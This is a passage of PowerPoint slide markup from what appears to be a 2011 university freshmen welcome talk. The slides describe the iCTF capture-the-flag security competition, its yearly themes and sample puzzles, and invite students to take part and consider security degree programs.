            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="2310402"/>
            <a:ext cx="5067300" cy="3714783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121960630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0025"/>
            <a:ext cx="8382000" cy="978729"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CyberWar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Competition Experiences</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469900" y="823913"/>
            <a:ext cx="8410575" cy="5983176"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>UCSB International Capture The Flag (also known as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>) is a distributed, wide-area security exercise, whose goal is to test the security skills of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>participants.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>rganized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>by Prof. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Giovanni </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:effectLst/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Vigna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>UCSB.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>First Friday of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>December. 9 hours </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>torture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>/exciting game including challenge/puzzle solving (coding, cryptography, stenography).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> 2003-2007 goal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>maintain services of a site  written in C, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, python, ruby, java, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>haskell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> (some do not have source code, need </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>decompiler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>exploit vulnerabilities of these service on other team’s site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Theme: Robbing the Bank, MAFIA  (RIAA lawsuit).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> 2008: attack multi-layer terrorist network and defuse bomb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> 2009: create botnet and compromise browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> 2010: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Lityaleak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>: attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Litya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> infrastructure (72 teams)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Required campus to open a VPN connection to UCSB.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Teams not allow to attack </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23224854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iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Puzzles</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312737" y="752603"/>
            <a:ext cx="8410575" cy="1384995"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is my password? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What secret message the spy is trying to send in this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>23</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37598"/>
            <a:ext cx="7816850" cy="4228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325113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iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> puzzles</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5533" y="1333365"/>
            <a:ext cx="7596767" cy="4389243"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="927100"/>
            <a:ext cx="7315200" cy="406265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is the last word contained in this message?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="444500" y="5854700"/>
            <a:ext cx="6731000" cy="406265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More in http://athena.uccs.edu/ictf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45892164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iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 2011 and related Cyber Events</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1103313"/>
            <a:ext cx="8410575" cy="2160591"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This year’s  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 12/2  Friday.  You are welcome to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>participate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>at UCCS.  Email me cchow@uccs.edu or Dr. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Chuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Yue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>cyue@uccs.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Greg William organized a cyber student club</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177961470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 Security Education Programs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="268287" y="823913"/>
            <a:ext cx="8410575" cy="1514261"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ph.D. Engineering in Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Master Engineering in Information Assurance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>26</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87" y="1852613"/>
            <a:ext cx="8875713"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558371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uclionLogo"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="457200"/>
            <a:ext cx="1304925" cy="1181100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2051" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="2514600"/>
            <a:ext cx="1320800" cy="3505200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1016000 w 832"/>
              <a:gd name="T1" fmla="*/ 0 h 2208"/>
              <a:gd name="T2" fmla="*/ 1168400 w 832"/>
